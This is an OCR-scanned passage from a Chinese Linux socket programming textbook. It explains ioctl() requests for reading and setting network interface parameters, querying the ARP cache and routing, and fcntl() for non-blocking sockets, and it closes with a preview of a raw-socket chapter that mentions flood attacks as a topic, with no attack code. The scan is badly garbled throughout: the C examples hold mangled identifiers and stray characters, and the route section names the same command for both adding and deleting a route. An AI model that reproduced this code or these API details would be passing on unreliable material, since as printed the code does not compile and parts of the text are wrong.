#define ifr broadaddr ifr ifru.ifru broadaddr /* 广 播 IP 地 址 */ 
#define ifr netmask ifr ifru.ifru netmask /* 子 网 掩 码 */ 
#define ifr flags ifr ifru.ifru flags /* 标 志 */ 
#define ifr metric ifr ifru.ifru ivalue /* 接 口 侧 度 */ 
#define ifr mtu ifr ifru.ifru mtu /* 最 大 传输 单元 */ 
#define ifr map ifr ifru.ifru map /* 设 备 地 址 映射 */ 
#define ifr slave ifr ifru.ifru slave /* 副 设备 */ 
#define ifr data LET JIErnU Erudata /* 接 口 使 用 */ 
#define ifr ifindex ifr ifru.ifru ivalue /* 网 络 接 口 序 号 */ 
#define ifr bandwidth ifr ifru.ifru ivalue /#* 连 接 带 宽 */ 
#define ifr qlen ifr ifru.ifru ivalue /* 传 输 单元 长 度 */ 
#define ifr newname ifr ifru.ifru newname /* 新 名 称 */ 
#define ifr settings ifr ifru.ifru settings /* 设 备 协 议 设置 */ 


其 中 ，struct ifmap 是 网 卡 设备 的 映射 属性， 包含 开始 地 址 、 绪 束 地 址 、 基 地 址 、 中 断 
号 、DMA 和 端口 号 等 。 


struct ifmap 
{ 


unsigned long mem start; /* 开 始 地 址 */ 
unsigned long mem end; /* 结 束 地 址 */ 
unsigned short base addr; /* 基 地 址 */ 
unsigned char irgq; /* 中 断 号 #/ 
unsigned char dma; /*DMA*/ 
unsigned char port; /* 端 口 */ 


/*3 字 节 空闲 */ 
}; 
网 络 的 配置 结构 体 是 一 块 缓冲 区 , 可 以 转换 为 结构 ifreq 来 方便 操作 ,用 于 读 取 网 络 接 
口 的 配置 情况 。 
/* 网 络 配 置 接口 */ 


Struct 1fconf 


{ 


/* 缓 冲 区 ifr_buf 的 大 小 */ 


int ifc len; 


union 
EL 
char _user *ifcu buf; /# 缓 冲 区 指针 */ 
struct ifreq _ user *+ifcu req; /* 指 向 结构 ifreq 的 指针 */ 


} ifc ifcu; 
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这 
#define ifc buf ifc ifcu.ifcu buf /* 缓 冲 区 地 址 的 宏 */ 
#define ifc req ifc ifcu.ifcu req /* 结 构 ifc_red 的 宏 */ 


2. 获取 网 络 接口 的 命令 选项 


不 同 的 命令 选项 可 以 获得 网 络 接口 的 不 同 参数 。 

(1) 获取 配置 选项 SIOCGIFCONF。 这 个 选项 用 于 获得 网 络 接口 配置 的 情况 。 需 要 填 
写 结构 struct ifreq 的 fr_name 变量 的 值 ， 即 将 需要 查询 的 网 络 接口 的 名 称 放 入 变量 中 。 返 
回 配 置 的 数据 和 长 度 。 

(2) 其 他 获取 选项 。 下 面 的 获取 地 址 的 请 求 需要 填写 结构 struct ifreq 的 这 _name 变量 
的 值 ， 即 将 需要 查询 的 网 络 接口 的 名 称 放 入 变量 中 ， 例 如 为 eth0。 返 回 值 放 在 这 addr 中 。 

口 SIOCGIFADDR: 获取 本 地 了 P 地 址 。 

口 SIOCGIFDSTADDR: 获取 目的 地 址 他 。 

口 SIOCGIFBRDADDR: 获取 广播 地 址 。 

口 SIOCGIFNETMASK: 获取 子 网 掩 码 。 

(3) 配制 网 络 接口 选项 。 与 获取 IP 地 址 相对 应 ， 设 置 IP 地 址 需要 填写 ifr name 变量 
的 值 ， 并 将 人 进 addr 设置 为 用 户 改变 的 耳 地 址 。 

口 SIOCSIFADDR: 设置 本 地 IP 地 址 。 

口 SIOCSIFDSTADDR: 设置 目的 IP 地 址 。 

口 SIOCSIFBRDADDR: 设置 广播 IP 地 址 。 

口 SIOCSIFNETMASK: 设置 子 网 抢 码 。 

(4) 网 络 接 口 的 底层 参数 获取 选项 。 下 面 的 请 求 命令 可 以 获得 接口 配置 情况 ， 需 要 设 
置 这 name 变量 ， 指 明 网 络 接口 ， 但 是 它们 的 返回 值 在 结构 ifreq 的 不 同 数据 结构 中 。 
SIOCGIFMETRIC: 获取 METRIC， 返 回 值 在 这 _metric 中 。 

SIOCGIFMTU: 获取 MTU， 返 回 值 在 这 mtu 中 。 

SIOCGIFHWADDR: 获取 MAC 地 址 ， 返 回 值 在 这 hwaddr.sa_data 中 ，6 个 字 节 。 
SIOCGIFINDEX: 获取 网 络 接口 的 序列 号 ， 返 回 值 在 这 ifindex 中 。 
SIOCGIFTXQLEN: 获取 发 送 缓冲 区 长 度 ， 返 回 值 在 认 _qlen 中 。 
SIOCGIFPFLAGS: 获取 标志 ， 返 回 值 在 这 _flags 中 。 

SIOCGIFMAP: 获取 网 卡 的 映射 情况 ， 返 回 值 在 结构 这 map 中 。 
SIOCGIFNAME: 获得 网 络 接口 的 名 称 ， 需 要 设置 结构 struct ifreq 的 ifr ifrindex 
变量 指明 获得 哪个 网 络 接口 的 名 称 。 返 回 值 在 这 name 中 。 

(5) 网 络 接口 的 底层 参数 配制 选项 。 与 获得 接口 配置 情况 对 应 如 下 的 请 求 命令 设置 接 
口 的 配置 参数 ， 需 要 设置 fr_name 变量 ， 指 明 网 络 接口 ， 它 们 需要 设置 与 获取 命令 对 应 的 
结构 ifreq 成 员 。 

口 SIOCSIFMETRIC: 设置 METRIC， 设 置 参 数 过 metric。 

口 SIOCSIFMTU: 设置 MTU， 设 置 参数 这 mtu。 

口 SIOCSIFHWADDR: 设置 硬件 地 址 ， 设 置 参数 ft hwaddr.sa_data。 

口 

加 | 


OOOOOOOOI 


SIOCSIFPFLAGS: 设置 标志 ， 设 置 参 数 这 flags。 
SIOCSIFTXQLEN: 设置 传输 队列 长 度 ， 设 置 参数 这 _qlen。 
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口 SIOCSIFMAP: 设置 网 卡 映射 情况 ， 设 置 参数 这 map， 这 个 参数 不 要 随便 修改 ， 


会 造成 系统 衣 溃 。 
口 SIOCSIFNAME: 设置 网 卡 名 称 ， 需 要 设置 结构 struct ifreq 的 fr_ifrindex 变量 ， 指 
明 设 置 哪个 网 络 接口 的 名 称 。 


3. 网 络 接口 的 获取 和 配制 例子 


对 网 络 接口 进行 操作 的 方式 十 分 简单 。 先 建立 一 个 socket 的 描述 符 ， 然 后 按照 需求 设 
置 需要 的 变量 ， 之 后 用 合适 的 请 求 命令 调用 ioctl() 函 数 。Ioctl 会 返回 成 功 或 者 失败 ， 需 要 
对 ioctl 的 返回 值 进行 确认 ， 否 则 可 能 没有 进行 操作 。 在 设置 网 络 IP 地 址 的 时 候 一 定 要 指 
明 其 协议 族 ， 否 则 不 能 成 功 地 设置 。 

下 面 的 程序 主要 分 为 4 部 分 进行 网 络 接口 请 求 命令 的 测试 ， 第 1 部 分 是 通过 一 个 序号 
获得 网 络 接口 的 名 称 ; 第 2 部 分 获取 网 络 接口 的 常用 配置 参数 ; 第 3 部 分 获取 IP 地 址 ; 第 
4 部 分 修改 一 下 本 机 的 IP 地址 。 

01 #include <stdio.h> 

02 #include <sys/types.h> 

03 #include <sys/socket.h> 

04 #include <netinet/in.h> 

05 #include <arpa/inet.h> 

06 #include <net/if arp.h> 

07 #include <string.h> 

08 #include <linux/sockios.h> 

09 #include <net/if.h> 

10 #include <sys/ioctl.h> 


11 #include <stdlib.h> 
12 #include <unistd.h> 


(1) 建立 套 接 字 。 先 建立 一 个 套 接 字 , 之 后 可 以 通过 这 个 套 接 字 对 网 络 接 口 进 行 操作 。 
建立 的 套 接 字 通常 是 SOCK_DGRAM 类 型 的 。 


13 int main(int argc, char *argv[]) 


14 { 

15 Tn 3 /* 套 接 字 描述 符 */ 
16 ES /* 错 误 值 */ 

17 /* 建 立 一 个 数据 报 套 接 字 * / 

18 s = socket(AF INET, SOCK DGRAM, 0); 

19 St 

20 printf ("socket () 出 错 \n"); 

多 return > 

22 } 


(2 ) 获 得 网 络 接 口 名 称 。 获得 网 络 接口 名 称 的 命令 为 SIOCGIFNAME, 在 参数 结构 ifreq 
中 ， 需 要 设置 网 络 接口 和 序号 ， 即 需要 设置 成 员 ifr_ifindex 的 值 。 本 例 中 将 这 iftindex 的 
值 设 置 为 2， 即 取 第 2 个 网 络 接口 的 名 称 。 


23 /* 获 得 网 络 接口 的 名 称 */ 

24 { 

25 struct ifreq ifr; 

26 End 0 /* 获 取 第 2 个 网 络 接口 的 名 称 */ 
boy i err = ioctl(s, SIOCGIFNAME, &ifr); 

28 if(err){ 

29 printf ("SIOCGIFNAME Error\n"); 
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30 }elsef{ 

EE printf ("the %dst interface is:%s\n",ifr.ifr ifindex,ifr. 
ifr name); 

32 } 

33 } 


(3) 获取 网 络 接口 配制 参数 。 获 取 网 络 接口 配制 的 命令 是 SIOCGIFFLAGS， 除 了 命令 
字 以 外 ， 还 需要 设置 变量 这 成 员 中 的 网 络 接口 名 称 ， 即 这 _name 的 值 。 例 子 中 将 fr_name 
的 值 设置 为 eth0， 即 查询 第 1 个 网 络 接口 的 配制 参数 。 


34 /* 获 得 网 络 接口 配置 参数 * / 

35 { 

36 /* 查 询 网 卡 "eth0" 的 情况 */ 

37 struct ifreq ifr; 

38 memcpy (ifr.ifr name, "eth0",5); 

39 /* 获 取 标 记 */ 

40 err = ioctl(s, SIOCGIFFLAGS, &ifr); 

41 zfE(!erzz) 1 

42 printf ("SIOCGIFFLAGS:%d\n",ifr.ifr flags); 
43 } 


(4) 获取 METRIC 的 值 。 获 取 最 大 METRIC 的 值 操作 比较 简单 ， 只 需要 设置 命令 字 
SIOCGIFMETRIC 即 可 。 


44 /* 获 取 METRIC*/ 

45 err = ioctl(s, SIOCGIFMETRIC, &ifr); 

46 if(!err){ 

47 printf ("SIOCGIFMETRIC: %d\n",ifr.ifr metric); 
48 } 


(5) 获取 MTU 和 MAC。 与 获取 METRIC 的 值 相似 ， 获 取 MTU 和 MAC 也 很 简单 ， 
需要 设置 命令 字 分 别 为 SIOCGIFMTU 和 SIOCGIFHWADDR 就 可 以 了 。 


49 /* 获 取 MTU*/ 

50 err = ioctl(s, SIOCGIFMTU, &ifr); 

51 if(!err){ 

S22 printf ("SIOCGIFMTU: $d\n",ifr.ifr mtu); 
53 } 

54 

55 /* 获 取 MAC 地 址 */ 

56 err = ioctl(s, SIOCGIFHWADDR, &ifr); 

57 if(!err){ 

58 char *hw = ifr.ifr hwaddr.sa data; 

59 printf ("SIOCGIFHWADDR: %02x:%02x:%02x:%02x:%02x:%02x\n", 
hw[0] ,hw[1],hw[2],hw[3],hw[4],hw[5]); 

60 } 


(6) 获取 网 卡 映射 参数 。 网 卡 要 能 够 正常 使 用 ， 需 要 将 网 卡 上 一 些 地 址 等 参数 映射 到 
主机 空间 上 。 获 取 网 络 映射 参数 的 命令 字 是 SIOCGIFMAP。 


61 /* 获 取 网 卡 映射 参数 */ 

2 err = ioctl(s, SIOCGIFMAP, &ifr); 

63 if(!err)t{ 

64 printf ("SIOCGIFMAP,mem start:%ld,mem end:%ld, 
base addr:%d, irq:%d, dma:%d,port:%d\n", 

65 ifr.ifr map.mem start, /* 开 始 地 址 */ 

66 ifr.ifr map.mem end, /* 结 束 地 址 */ 


"i 


67 
68 
69 
70 
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ifr.ifr map.base addr, /* 基 地 址 */ 

Lfr If nmap rg 7 /* 中 断 */ 
ifr.ifr map.dma ， /* 直 接 访问 内 存 */ 
LEr: 1fr map Pot J) /* 端 口 */ 


} 


(7) 获取 网 卡 序号 。 获 取 网 卡 序号 使 用 命令 SIOCGIFINDEX， 可 以 获得 网 络 接口 名 称 
所 对 应 的 序号 。 


72 
I 
74 
全 
76 


/* 获 取 网 卡 序号 */ 
err = ioctl(s, SIOCGIFINDEX, &ifr); 
4f(1err}t 
printf ("SIOCGIFINDEX:%d\n",ifr.ifr ifindex); 
} 


(8) 获取 发 送 队 列 长 度 。 获 取 发 送 队 列 长 度 的 命令 字 是 SIOCGIFTXQLEN， 发 送 队 列 
的 长 度 保存 在 成 员 变量 这 qlen 中 。 


yg 
78 
79 
80 
81 


/* 获 取 发 送 队列 长 度 */ 
err = ioctl(s, SIOCGIFTXQLEN, &ifr); 
if(!err){ 
printf ("SIOCGIFTXQLEN: %d\n",ifr.ifr qlen); 
1 


(9) 获取 网 络 接口 IP 地 址 。 网 络 接口 IP 地 址 相关 的 参数 有 本 地 IP 地 址 、 广 播 耳 地址、 
目的 人 P 地址 及 子 网 络 掩 码 等 ， 它 们 分 别 适用 命令 字 SIOCGIFADDR、SIOCGIFBRDADDR、 


SIOCGIFDSTADDR 和 SIOCGIFNETMASK 来 得 到 。 注 


所 得 到 的 数值 都 放 在 结构 ifreq 


的 成 员 变 量 fi_addr 中 。 
/* 获 得 网 络 接口 IP 地 址 */ 


82 
83 
84 
85 
86 
87 
88 
89 
90 
91 
92 
93 
94 
95 
96 
3 
98 
39 
100 
101 
102 
103 
104 
105 
106 
107 
108 


{ 


struct ifreq ifr; 


/* 方 便 操作 设置 指向 sockaddr in 的 指针 */ 

struct sockaddr in *sin = (struct sockaddr in *)&ifr.ifr addr; 
char ip[16]; /* 保 存 IP 地 址 字符 串 */ 

memset (ip, 0, 16); 

memcpy (ifr.ifr name, "eth0",5);/* 查 询 eth0*/ 


/* 查 询 本 地 IP 地 址 */ 
err = ioctl(s, SIOCGIFADDR, &ifr); 


if(!err)t{ 
/* 将 整 型 转化 为 点 分 四 段 的 字符 串 */ 
inet_ntop (AF_INET，&sin->sin_ addr.s addr, ip, 16 ); 
printf ("SIOCGIFADDR:%s\n",ip); 


/* 查 询 广播 IP 地 址 */ 
err = ioctl(s, SIOCGIFBRDADDR, &ifr); 
iE Uerr)t 
/* 将 整 型 转化 为 点 分 四 段 的 字符 串 */ 
inet ntop(AF INET, &sin->sin addr.s addr, ip, 16 ) 
printf ("SIOCGIFBRDADDR:%s\n",ip); 


/* 查 询 目的 IP 地 址 */ 
err = ioctl(s, SIOCGIFDSTADDR, &ifr); 


Ss 
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Aif(lerr)t 
/* 将 整 型 转化 为 点 分 四 段 的 字符 串 */ 
inet ntop(AF INET，&sin->sin addr.s addr, ip, 16 ) 
printf ("SIOCGIFDSTADDR: $s\n",ip); 


/* 查 询 子 网 掩 码 */ 
err = ioctl(s, SIOCGIFNETMASK, &ifr); 
if(!err){ 
/* 将 整 型 转化 为 点 分 四 段 的 字符 串 */ 


inet ntop(AF INET, &sin->sin addr.s addr, ip, 16 ) 
printf ("SIOCGIFNETMASK:%s\n",ip); 


(10) 设置 网 络 接口 IP 地 址 。 设 置 网 络 接 口 IP 地 址 的 方法 与 获取 网 络 接 口 IP 地 址 的 


方法 类 似 。 
123 
124 
125 
126 
1 
128 
129 
130 
131 
132 
133 
134 
135 
136 
137 
138 
139 
140 
141 
142 
143 
144 
145 
146 
147 
148 
149 
150 
151 
152 
153 } 


/* 测 试 更 改 IP 地 址 */ 


{ 


struct ifreq ifr; 
/* 方 便 操作 设置 指向 sockaddr_in 的 指针 */ 
struct sockaddr in *sin = (struct sockaddr in *)&ifr.ifr addr; 


char ip[16]; /* 保 存 IP 地 址 字符 串 */ 


int err = -1; 


/* 将 本 机 IP 地 址 设置 为 192 .169.1.175*/ 

printf("Set TP to L192.160.1.175N\n")s 

memset (&ifr, 0, sizeof (ifr)); /* 初 始 化 */ 

memcpy (ifr.ifr name, "eth0",5); /* 对 eth0 网 卡 设置 IP 地 址 */ 
inet pton(AF INET, "192.168.1.175", &sin->sin addr.s addr); 
/* 将 字符 串 转换 为 网 络 字 节 序 的 整 型 */ 


sin->sin family = RE INET; /* 协 议 族 */ 
err = ioctl(s，SIOCSIFADDR，&ifr) ; /* 发 送 设置 本 机 IP 地 址 请 求 命令 */ 
ifl(lerr){ /* 失 败 */ 
printf ("SIOCSIFADDR error\n"); 
}elsel{ /* 成 功 ,再 读 取 一 下 进行 确认 */ 


printf("check IP ==) 

memset (&ifr, 0，sizeof (ifr)); /* 重 新 清 零 */ 

memcpy (ifr.ifr name, "eth0",5);/* 操 作 eth0*/ 
ioctl(s，SIOCGIFADDR，&ifr); ”/* 读 取 */ 

inet ntop (RE INET, &sin->sin addr.s addr, ip, 16); 


/* 将 IP 地 址 转换 为 字符 串 */ 
printf("%s\n",ip); /* 打 印 */ 
} 
} 
close(s); 
return 0; 


(11) 编译 并 运行 程序 。 将 上 述 代 码 保存 为 ioctl_ if.c， 进 行 编译 : 


Ce i 


运行 程序 之 


ioctls 


-i 


的 本 机 卫 地 址 为 192.168.83.188， 运 行 后 的 输出 为 : 


the 2st interface is:eth0 
SIOCGIFFLAGS:4163 
SIOCGIFMETRIC:0 

SIOCGIFMTU:1500 
SIOCGIFHWADDR:00:0c:29:1f:00:35 
SIOCGIFMAP,mem start:0,mem end:0, base addr:8192, irq:19, dma:0,port:0 
SIOCGIFINDEX:2 
SIOCGIFTXQLEN:1000 
SIOCGIFADDR:192.168.83.188 
SIOCGIFBRDADDR:192.168.83.255 
SIOCGIFDSTADDR:192.168.83.188 
SIOCGIFNETMASK:255.255.255.0 
Set IP to 192.168.1.175 

Check IP --192.168.1.175 


使 用 ifconfig 查看 IP， 发 现 原来 的 IP 地 址 已 经 成 功 地 进行 了 更 改 。 


$ ifconfig eth0 

eth0 Link encap: 以 太 网 硬件 地 址 00:0c:29:1f:00:35 
inet 地 址 :192.168.1.175 广播 :192.168.1.255 掩 码 :255.255.255.0 
inet6 地 址 : fe80::20c:29ff:felf:35/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 跃 点 数 :1 
接收 数据 包 :2417 错误 :0 丢弃 :0 过 载 :0 帧 数 :0 
发 送 数据 包 :1354 错误 :0 丢弃 :0 过 载 :0 载波 :0 
碰撞 :0 发 送 队 列 长 度 :1000 
接收 字 节 :2264081 (2.2 MB) 
中 断 :19 基本 地 址 :0x2000 


发 送 字 节 :144150 (144.1 KB) 


12.6.5 ”使 用 ioctl() 函 数 对 ARP 高 速 缓存 操作 

ARP 高 速 缓存 表 是 网 络 协议 栈 维护 的 ， 它 记录 了 系统 运行 期 间 的 IP 地 址 和 硬件 地 址 
的 映射 表 。 其 操作 包括 表 的 创建 、 更 新 、 回 收 ， 在 Linux 下 这 个 表 的 名 称 是 arp_tbl。 

1. 获取 ARP 高 速 缓存 的 命令 字 

使 用 ioctlO 的 ARP 请 求 可 以 实现 对 这 个 表 的 操作 ,有 3 个 命令 SIOCGARP、SIOCSARP 
和 SIOCDARP。 用 户 可 以 调用 这 3 个 请 求 命令 对 ARP 高 速 缓存 进行 操作 ， 操 作 是 通过 类 
型 为 struct arpreq 的 参数 进行 的 。 其 定义 在 文件 <net/if_arp.h> 中 ， 结 构 struct arpreq 如 下 : 


/*ARP 的 ioct1l 请 求 */ 
struct arpredq { 


struct sockaddr arp pa; /* 协 议 地 址 */ 
struct sockaddr arp ha; /* 硬 件 地 址 */ 
int arp flags; /* 标 记 */ 
struct sockaddr arp_netmask; /* 协 议 地 址 的 子 网 掩 码 ( 仅 用 于 代理 arp) */ 
char arp_dev[16]; /* 查 询 的 网 络 接口 名 称 */ 
3 
/*ARP 的 标记 值 */ 
#define ATF_COM 0x02 /* 查 找 完成 的 地 址 */ 
#define ATF_PERM Ox04 /* 永 久 记录 */ 
#define ATF_PUBL 0x08 /* 发 布 记录 */ 
#define ATF_ USETRAILERS 0x10 /* 使 用 扩展 存档 名 称 , 不 再 使 用 */ 
#define ATF NETMASK 0x20 /* 使 用 掩 码 ( 仅 用 于 arp 代码 ) */ 
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#define ATF_DONTPUB 0x40 /* 不 回复 */ 
#define ATF_ MAGIC 0x80 /* 自 动 添加 的 邻居 */ 


3 个 ioctl0 的 请 求 命令 含义 如 下 所 述 。 


口 


2: 


SIOCDARP: 删除 高 速 缓存 中 的 一 个 记录 。 使 用 此 命令 时 , 需要 在 结构 struct arpreq 
中 填写 成 员 arp_pa 和 成 员 arp_dev，Linux 内 核 会 根据 arp_pa 中 的 IP 地 址 高 速 组 
存 中 查找 该 记录 ， 并 把 它 的 状态 更 新 为 失败 (NUD_FAILED) ， 这 样 在 ARP 的 下 
一 次 垃圾 回收 过 程 中 会 被 丢弃 掉 。 
设置 或 者 修改 一 个 记录 。 使 用 该 命令 时 ， 需 要 在 结构 struct arpreq 中 
写成 员 arp_pa、arp_ha 和 arp_flags。 如 果 在 高 速 缓存 中 已 经 有 该 记录 项 ， 会 根 
We 如 果 没 有 则 建立 该 项 ， 并 将 此 项 的 状态 设置 为 永 
久 性 的 (ATF_PERM) ， 除 非 之 后 用 户 手 动 又 一 次 进行 了 设置 ， 否 则 以 后 不 会 自 
动 对 其 进行 失效 和 更 新 。 
SIOCGARP: 获得 一 个 记录 。 使 用 时 ， 需 要 在 结构 struct arpreq 中 填写 成 员 arp_pa 
的 值 ， 内 核 会 从 高 速 缓存 中 查找 该 项 并 返回 记录 。 不 过 一 般 查 看 高 速 缓存 ， 并 不 
使 用 SIOCGARP 请 求 命 令 ， 而 是 直接 从 内 存 映 像 文件 proc/net/arp 中 读 取 。 


获取 ARP 高 速 缓存 的 例子 


下 面 是 一 个 获取 主机 IP 地 址 对 应 硬件 地 址 的 实例 。 用 户 输入 需要 查询 的 IP 地 址 ， 输 
出 为 对 应 IP 地 址 的 硬件 地 址 。 

程序 先 建立 一 个 SOCK_DGRAM 的 数据 报 套 接口 ， 使 用 用 户 输入 的 IP 地 址 和 协议 族 
类 型 填充 结构 体 arpreq 的 成 员 arp_ pa， 在 eth0 网 络 接 口上 进行 查询 ， 然 后 调用 ioctl0) 的 
SIOCGARP 请 求 命令 ,如 果 下 地 址 对 应 的 硬件 地 址 存在 的 话 , 从 结构 体 arpreq 的 成 员 arp_da 
中 取出 硬件 地 址 ( 即 MAC 地 址 )。 


01 
02 
03 
04 
05 


#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <net/if arp.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/ioctl.h> 
int main(int argc, char *argv[]) 
{ 
int 3; 
struct arpreq arpreqg; 
struct sockaddr in *addr = (struct sockaddr in*) &arpreq.arp pa; 
unsigned char *hw; 
int err = 3 
if(argc < 2) 
99 ce tn 错误 的 使 用 方式 ， 格式 为 : \nmyarp ip (myarp 127.0.0.1)\n"); 
return -1; 
站 
/* 建 立 一 个 数据 报 套 接 字 */ 
S = socket(AF INET, SOCK DGRAM, 0); 
if (s <0) { 
printf ("socket () 出 错 \n") ; 
return -1; 


26 } 

2 /* 填 充 arpreq 的 成 员 arp pa*/ 

28 addr->sin family = RE INET; 

29 addr->sin addr.s addr = inet addr (argv[1]); 

30 if(addr->sin addr.s addr == INADDR NONE) { 

3 printf ("IP 地 址 格式 错误 \n") ; 

32 )， 

33 /* 网 络 接口 为 eth0*/ 

34 strcpy (arpreq.arp dev, "eth0"); 

35 err = ioctl(s, SIOCGARP, &arpreq); 

36 if(err < 0){ 人 拓 几 2/ 
37 Printf("IOCTL 错误 \n") ; 

38 return -1; 

39 }else{/* 成 功 */ 

40 hw = (unsigned char*) &arpreq.arp ha.sa data;  /* 人 硬件 地 址 */ 
41 printf ("%s:",argv[1]);/* 打 印 IP*/ 

42 printf ("$02x:%02x:$02x:$02x:%$02x:%02x\n", /* 打 印 硬件 地 址 */ 
43 hw[0],hw[1],hw[2] ,hw[3],hw[4],hw[5]); 

44 Ys 

45 close(s); 

46 return 0; 

47 } 


将 上 面 的 代码 保存 到 文件 ioctl_arp.c 中 ， 编 译 生成 可 执行 文件 ioctl_arp。 

$gcc -o ioctl arp ioctl arp.c 

对 IP 地址 192.168.1.1 进行 查询 的 结构 为 。 

RAT 

192.168.1.1==>00:14:78:c3:ff:54 

IP 地 址 192.168.1.1 对 应 的 硬件 地 址 为 00:14:78:c3:ff54。 使 用 arp-a 查询 高 速 绥 存 的 
记录 。 

$ arp -a 

h (192.168.1.1) at 00:14:78:C3:FF:54 [ether] on eth0 

二 者 的 结果 一 致 。 
12.6.6 ”使 用 ioctl() 函 数 发 送 路 由 表 请 求 


ioctl0 函 数 的 路 由 表 请 求 有 两 种 , 这 两 种 请 求 的 第 三 个 参数 是 一 个 指向 结构 的 指针 , 在 
文件 <net/route.h> 中 定义 。 命 令 选项 有 两 个 : SIOCADDRT 和 SIOCADDRT。 

口 SIOCADDRT: 向 路 由 表 中 增加 一 项 。 

口 SIOCADDRT: 从 路 由 表 中 减 去 一 项 。 

使 用 上 面 的 参数 没有 办 法 列 出 所 有 路 由 表 中 的 所 有 项 。 


12.7 fcntlO 函 数 


函数 fentlO0) 对 套 接 字 描述 符 进 行 操作 ， 同 样 可 以 对 通用 文件 描述 符 进行 操作 。 其 函数 
原型 如 下 : 


dint Eeatl(int fd dint cmndy volid arg)? 


sl 
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12.7.1 fcntl() 函 数 的 选项 


对 套 接 字 进行 操作 的 fcntlO 函 数 有 4 种 ， 分 为 设置 套 接 字 属 主 、 获 取 套 接 字 属 主 、 设 
置 套 接 字 为 信号 驱动 类 型 和 设置 套 接 字 为 非 阻塞 类 型 ， 如 表 12.4 所 示 。 


表 12.4 fcntl 的 命令 选项 


含义 
设置 套 接 字 属 主 
获取 套 接 字 属 主 
设置 套 接 字 为 信号 驱动 IO 
设置 套 接 字 为 非 阻 塞 IO 


与 ioctl 相同 的 功能 
FIOSETOWN 
FIOGETOWN 
FIOASYNC 

FIONBIO 


F_ SETOWN 
F_GETOWN 
F_SETFL, O_ASYNC 

F_SETFL, O NONBLOCK 


可 见 对 套 接 字 的 fentl() 使 用 ioctl0 函 数 可 以 完全 代替 ,因此 使 用 fcntl0) 函 数 对 套 接 字 进 
行 操作 的 使 用 比较 少 ， 通 常用 ioctl() 函 数 代 蔡 。 


12.7.2 使 用 fcntl() 函 数 修改 套 接 字 非 阻塞 属性 


函数 fentl() 的 命令 F_SETFL 和 F_GETFL 命令 , 与 O_ ASYNC 和 O_NONBLOCK 搭配 
可 以 获取 或 者 设置 套 接 字 的 非 阻塞 属性 。 常 用 的 设置 非 阻塞 fcntl() 操 作 方 式 的 代码 如 下 : 


int flags = -1; /* 套 接 字 属性 值 */ 

dnt SEE 了 7 /* 错 误 值 */ 

flags = fcntl(s, F_ GETFL, 0); /* 获 取 套 接 字 s 的 属性 值 */ 

if(flags < 0){ /* 获 取 套 接 字 属性 值 操作 失败 */ 
printf ("fcntl F GETFL ERROR\Nn"); 

} 

if(! (flagsg& NON_ BLOCK)) /* 查 看 属性 值 中 是 否 有 非 阻塞 选项 NON_BLOCK*/ 

{ 
flags |= NON BLOCK; /* 向 属性 值 中 增加 非 阻塞 选项 NON_BLOCK*/ 
err = fentl(s, F SETFL, flags); /* 使 用 新 的 属性 值 设 置 文件 描述 符 */ 
fier OM /* 设 置 文件 描述 符 属性 失败 */ 


printf ("fcntl F_SETFL ERROR\n"); ”/* 打 印 失 败 信息 */ 
} 
}elset /* 文 件 描述 符 属 性 已 经 为 非 阻塞 */ 
printf ("socket %d already set to NON BLOCK\n",s); /* 打 印信 息 */ 
} 


先 读 取 套 接 字 描述 符 的 属性 ， 当 没有 设置 NON_BLOCK 属性 的 时 候 ， 添 加 
NON_BLOCK 属性 。 不 要 直接 设置 套 接 字 属 性 为 NON_BLOCK， 这 会 将 之 前 套 接 字 的 属 
性 覆盖 。 例 如 ， 下 面 的 方式 是 不 好 的 使 用 习惯 : 


int flags = NON BLOCK; 
err = fcntl(s, F_ SETFL, flags); 


12.7.3 ”使 用 fcntl() 函 数 设 置信 号 属 主 


给 套 接 字 设 置 属 主 是 因为 信号 SIGIO 和 SIGURG， 这 两 个 信号 需要 使 用 命令 
F_SETOWN 设 定 了 进程 属 主 才 能 生成 。 
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属 主 在 第 3 章 中 已 经 介绍 过 ， 这 里 再 简单 介绍 一 下 。F_SETOWN 的 参数 arg 为 正 数 时 
表示 绑 定 的 为 进程 ID， 为 负数 时 其 绝对 值 为 进程 组 的 ID。F_GETOWN 获取 的 值 含义 与 
F_SETOWN 一 样 。 


全 注意 ; 一 个 套 接 字 在 使 用 socket() 函 数 生成 的 时 候 是 没有 属 主 的 ， 当 服务 器 的 accept() 函 
数 返 回 一 个 新 的 套 接 字 描述 符 时 ， 有 了 属 主 ， 其 属 主 是 从 监听 套 接 字 继 承 来 的 。 


12.8 小 结 


本 章 介 绍 了 如 何 使 用 函数 setsockopt() 和 getsockopt0) 设 置 和 获取 套 接 字 选项 的 值 。 这 两 
个 函数 和 相关 的 选项 在 调整 网 络 的 性 能 和 功能 方面 起 着 重要 的 作用 。 

套 接 字 选项 的 广播 参数 将 在 高 级 套 接 字 中 进行 介绍 。 套 接 字 IP 级 别 部 分 可 以 调整 底层 
的 性 能 或 者 一 些 特 定 的 用 途 。 例 如 设置 了 IP_HDRINCL 的 套 接 字 , 在 接收 数据 和 发 送 数据 
的 时 候 ， 其 数据 包含 了 IP 头 部 的 数据 ， 因 此 在 处 理 时 需要 考虑 ， 这 是 原始 套 接 字 的 内 容 。 
函数 ioctl() 和 fentl() 利 用 命令 字 来 控制 网 络 参数 。 主 要 包含 IO 命令 、 文 件 命令 、 网 络 接口 
命令 、ARP 命令 ， 以 及 路 由 表 命 令 。 
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通常 情况 下 程序 设计 人 员 接 触 的 网 络 知识 限于 如 下 两 类 。 


口 流 式 套 接 字 (SOCK_STREAM) : 它 是 一 种 面向 连接 的 套 接 字 ， 对 应 于 TCP 应 用 


程序 。 


口 数据 报 套 接 字 (SOCK_DGRAM) : 它 是 一 种 无 连接 的 套 接 字 ， 对 应 于 的 UDP 应 


用 程序 。 


除了 以 上 两 种 基本 的 套 接 字 外 还 有 一 类 原始 套 接 字 ， 它 是 一 种 对 原始 网 络 报 文 进行 处 


理 的 套 接 字 。 本 章 将 介绍 原始 套 接 字 相 关 的 概念 和 应 用 ， 主 要 包括 以 下 内 容 : 
原始 套 接 字 的 创建 ; 

原始 套 接 字 发 送 报 文 ; 

原始 套 接 字 接收 报 文 ; 

利用 原始 套 接 字 进 行 报 文 处 理 ; 

一 个 简单 的 ping 的 例子 ; 

网 络 安全 中 经 常 使 用 的 洪水 攻击 ， 洪 水 攻击 的 基本 原理 ,使 用 ICMP、UDP、S 
进行 洪水 攻击 的 方法 和 样 例 代码 。 

